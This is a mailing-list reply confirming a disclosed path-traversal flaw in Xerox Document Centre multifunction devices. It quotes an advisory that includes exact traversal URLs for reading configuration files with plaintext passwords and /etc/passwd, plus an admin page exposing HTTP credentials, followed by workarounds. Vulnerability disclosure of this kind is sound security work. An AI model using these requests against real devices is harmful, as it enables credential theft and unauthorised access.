Re: Security bug in Xerox Document Centre
In-Reply-To: <20031219141657.A1147@xxxxxxxxxxxxxxxxxxx>
Just tested this out on a few different models of Xerox multifunction devices
of ours as well, and all three were vulnerable. Following systems apply:
Document Centre 440DC
Document Centre 480DC
Document Centre 425ST
>TECHNICAL INFO
>===============================================================================
>
>Vulnerable systems
>- --------------------------------------------------------------
>
> Xerox Document Centre 470, 255ST and maybe others.
> Software : Xerox_MicroServer
> Version : Xerox11 0.19.5.509
> OS : LynxOS:E2.1_SMP.063.1:02/13/2003
>
>
>Impact
>- -----------------------------------------
>
>
> Remote access to files.
> Access to plaintext passwords for the http administration interface.
> Access to DES passwords for the operating system.
> Read-write access to http users and passwords
>
>
>Details
>- --------------------------------------------------------------
>
> Web server software (self-reports as "Xerox_MicroServer/Xerox11")
> for Xerox hardware will return a binary dump of directories when
> the requested URL ends with "/.." or "/."; so you can build easily
> the directory/file tree from document root and get every file.
>
> At first, you can't get back past document root, since httpd seems
> to reject "../" if it would climb back too much:
>
>
> GET /../.. -> "The request had invalid syntax."
>
> But it does accept "../":
>
> GET /assist/.. -> OK
>
> So maybe it just counts "../" groups and compares the count
> to the total number of "/" ? Let's try:
>
> GET /assist/////.././../../. -> OK
>
>
>
> Examples:
>
> - http://xerox_dc_470.example.com/..
>
>
>00 00 00 00 45 00 0c 00 01 2e 00 00 00 00 00 00 43 ...E...........C
>10 00 0c 00 02 2e 2e 00 00 00 00 00 46 00 10 00 06 ...........F....
>20 63 6f 6e 66 69 67 00 00 00 00 00 48 00 10 00 06 config.....H....
>30 68 74 64 6f 63 73 00 00 00 00 02 26 00 10 00 04 htdocs.....&....
>40 6a 6f 62 73 00 00 00 00 00 00 02 29 01 b8 00 04 jobs.......)....
>50 6c 61 6e 67 00 00 00 00 00 00 00 00 00 00 00 00 lang............
>60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
>
> - http://xerox_dc_470.example.com////../../data/config/microsrv.cfg
>
> and you get full configuration, including plain text passwords.
>
> - http://xerox_dc_470.example.com////////../../../../../../etc/passwd
>
> and you get a passwd file to run crack on
>
>
> Even without having to use ".." you can get the plain text passwords
> for the HTTP interface using
>
> http://xerox_dc_470.example.com/srvadmin/usersecure.dhtml
>
> From that page, you can even create new users; when you press
> "Apply new settings" button prompts for admin password (the
> same you just have read in that same page)
>
>
> Probably you could use this to steal documents from the printer
> queue, but I haven't verified this.
>
>
> Note: to test this vulnerability do not use any "smart" http client
> which will rewrite the URL internally to suppress '../' parts.
>
>
>
>Workaround
>- ---------------------------------------------------------------------
>
> - Disable http interface.
> - Restrict access permissions to trusted hosts
>
>===============================================================================
>
>
>--
>finger spd@xxxxxxxxxxxxxxxxxxx for PGP /
>.mailcap tip of the day: / La vida es una carcel
>application/ms-tnef; cat '%s' > /dev/null / con las puertas abiertas
>text/x-vcard; cat '%s' > /dev/null / (A. Calamaro)
>